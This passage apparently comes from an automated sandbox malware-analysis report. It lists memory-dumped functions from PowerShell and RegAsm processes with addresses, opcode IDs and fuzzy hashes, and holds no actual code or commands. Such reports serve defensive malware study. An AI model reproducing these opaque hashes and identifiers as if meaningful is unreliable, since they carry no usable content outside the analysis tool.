                                                              • Source File: 0000000F.00000002.2537266518.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ff848f60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cef9888661b438cd32c2d8b77e667a187db20ba94b626a6740a885c70466958
                                                              • Instruction ID: 690350359374311f5142cc0ea35cbc073198c5286017cd6d2cbfb5b381a52e1b
                                                              • Opcode Fuzzy Hash: 8cef9888661b438cd32c2d8b77e667a187db20ba94b626a6740a885c70466958
                                                              • Instruction Fuzzy Hash: 39D14831E0EACA5FE756AB6858545B57BE0FF06390F0802FAD44DDB1D3DB28A806C355
                                                              Function 00007FF848E933B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2535420658.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ff848e90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction ID: 29c1cfa6bac51b81d075f13f06edf054ad2643bd55ff8ec3c5d015a1cc12a693
                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction Fuzzy Hash: 6C01677115CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45

                                                              Executed Functions

                                                              Function 029A0901 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq
                                                              • API String ID: 0-725504367
                                                              • Opcode ID: 02f4e0a86d062dc70bc3d5900269e28f9bd3bb961dc7916561e4001a2aec99e3
                                                              • Instruction ID: 400a141fca914e9ca5152742d73c53ed313d1f46ca4144200048ad722516d323
                                                              • Opcode Fuzzy Hash: 02f4e0a86d062dc70bc3d5900269e28f9bd3bb961dc7916561e4001a2aec99e3
                                                              • Instruction Fuzzy Hash: 8221E430E052098FDB04EFB8C4653AE7BB5FF84704F2444A9D44A9B285EB359E06CBC1
                                                              Function 029A0D20 Relevance: .2, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 849c33d4a069fa660d2b4dee21bb8436b7568ff38c9f9a36b51cd1ef91266a31
                                                              • Instruction ID: c87a77b5caa08f1a33cd5edaab862e8869c161fd2d613c3a3f9d42a881c20f4b
                                                              • Opcode Fuzzy Hash: 849c33d4a069fa660d2b4dee21bb8436b7568ff38c9f9a36b51cd1ef91266a31
                                                              • Instruction Fuzzy Hash: 847193357002058FCB19EF78E568A6E7BE6FF88604B508928D04A9B7A9DF359C05CF81
                                                              Function 029A0D10 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92b8771b722fa6801173c3abcb3468b8fab02812eec4ae6744ee68b58827a538
                                                              • Instruction ID: a62d4eae6adb33e621f185a81f2a9746a6dd673cb333d3730374fce12f98911a
                                                              • Opcode Fuzzy Hash: 92b8771b722fa6801173c3abcb3468b8fab02812eec4ae6744ee68b58827a538
                                                              • Instruction Fuzzy Hash: ED4172356003058FCB19EF78E57856E7BE6FF84204340492CC44A8B658EF399C09CF85
                                                              Function 029A14B1 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3ca7fdffd7e30dfd1a7deb8fc869e0c3db2279993e504060665507bfb9b4821
                                                              • Instruction ID: 6c90fd010c8ae3276809415c1c9201a669c0f392a1d4da85268f779030a22819
                                                              • Opcode Fuzzy Hash: a3ca7fdffd7e30dfd1a7deb8fc869e0c3db2279993e504060665507bfb9b4821
                                                              • Instruction Fuzzy Hash: 63218771B043155FDB04AFBE996436EBAEEEFC8610B10483DD48AD7395DD388C068BA5
                                                              Function 029A1391 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00a5067cde89954b6bffbf174dd0b8629e10e2e383d83d6ee32648fd2de8bb7a
                                                              • Instruction ID: abd0fca9ee2928a8c0e6bf337b56fa9c64aa1c381cb9d2a0c14ec9a95cc1a07c
                                                              • Opcode Fuzzy Hash: 00a5067cde89954b6bffbf174dd0b8629e10e2e383d83d6ee32648fd2de8bb7a
                                                              • Instruction Fuzzy Hash: 5831B174D00309DFCB05EF78EA546AE7BB6FF84304F104A69D405AB258DB359A45CF91
                                                              Function 029A13A0 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70ce47a88c41af04c37ccaad023025c855a0c7d9117677baa20db65dc9974a7c
                                                              • Instruction ID: e7fde75edba4756b8ef596335cf5e5c1ecba71483fe5311cb4eafe9bf7923d79
                                                              • Opcode Fuzzy Hash: 70ce47a88c41af04c37ccaad023025c855a0c7d9117677baa20db65dc9974a7c
                                                              • Instruction Fuzzy Hash: B8218D74D00209DFCB05EFB8EA54AAEBBBAFF84304F104929D405A7358DB35AA45CB91
                                                              Function 029A0E0A Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55d8c17cedc512b4b2ad95b59c8c289699cfb44074a29872b42e7486b867b299
                                                              • Instruction ID: 480a94001385704d67c474920350cf9a2f55e2b60ddd52d8ce3b7cd3f8b7495f
                                                              • Opcode Fuzzy Hash: 55d8c17cedc512b4b2ad95b59c8c289699cfb44074a29872b42e7486b867b299
                                                              • Instruction Fuzzy Hash: D4216232700B414BCA6DAB79D46856E7AEABFC42143104D3DC09A8B694DF39DD0A8FC6
                                                              Function 029A0838 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 77707167c80b7371ea6cb3325cc171107f00ba0d71ddf93c7f860a3f7ea4c521
                                                              • Instruction ID: 02787e51a9cd75fa8d331a67caf1ab701dbd377df9634ddce736ff52c8937f3d
                                                              • Opcode Fuzzy Hash: 77707167c80b7371ea6cb3325cc171107f00ba0d71ddf93c7f860a3f7ea4c521
                                                              • Instruction Fuzzy Hash: BA11F1341412199FCB06EF28FB80E5E77A9FF4430DB108A64D0088FA2DD775AA49CF81
                                                              Function 029A0848 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de26a21e77b8d57f7ff3d6b2a4237fd3aa62c31d047e4828daa24b1e3518bfc7
                                                              • Instruction ID: c6e68a4f17f9f71f2d85f5efb0be23111e25b20dd1ee88c125826f31c8df1671
                                                              • Opcode Fuzzy Hash: de26a21e77b8d57f7ff3d6b2a4237fd3aa62c31d047e4828daa24b1e3518bfc7
                                                              • Instruction Fuzzy Hash: BA0199341402299FCB06EF18FB90D5E77A9FF443097119A6490088BA2DD775AA49DF81